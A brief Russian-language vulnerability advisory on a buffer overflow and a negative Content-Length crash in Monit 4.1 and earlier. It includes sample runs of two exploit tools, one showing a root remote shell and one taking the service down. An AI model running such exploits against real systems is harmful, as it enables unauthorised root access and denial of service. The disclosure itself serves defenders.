Программа: Monit 4.1 и более ранние версии 

Две уязвимости обнаружены в Monit. Злонамеренный пользователь может вызвать отказ в обслуживании или скомпрометировать уязвимую систему. 

1. Удаленный атакующий может представить чрезмерно длинный HTTP метод, чтобы вызвать переполнение буфера в HTTP интерфейсе. 

2. Удаленный атакующий может послать HTTP запрос с отрицательным значением в поле "Content-Length:", чтобы аварийно завершить работу целевого сервера. 

Пример: 

./xonya -t 3 -p 2812 192.168.3.12

Selected platform 3 ...
Retaddr is 0xXXXXXXXX, nulladdr is 0xXXXXXXXX ...
Connected to 192.168.3.12:2812
Sending the request ...
Got a remote shell:

Linux 2.4.20 i686 unknown
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
exit

$./donit -p 2812 192.168.3.12

Connecting to 192.168.3.12:2812 ...
Sending the request ...
Done.

$ nc -v 192.168.3.12 2812
lina.s-quadra.com [192.168.3.12] 2812 (?) : Connection refused

Оставить мнение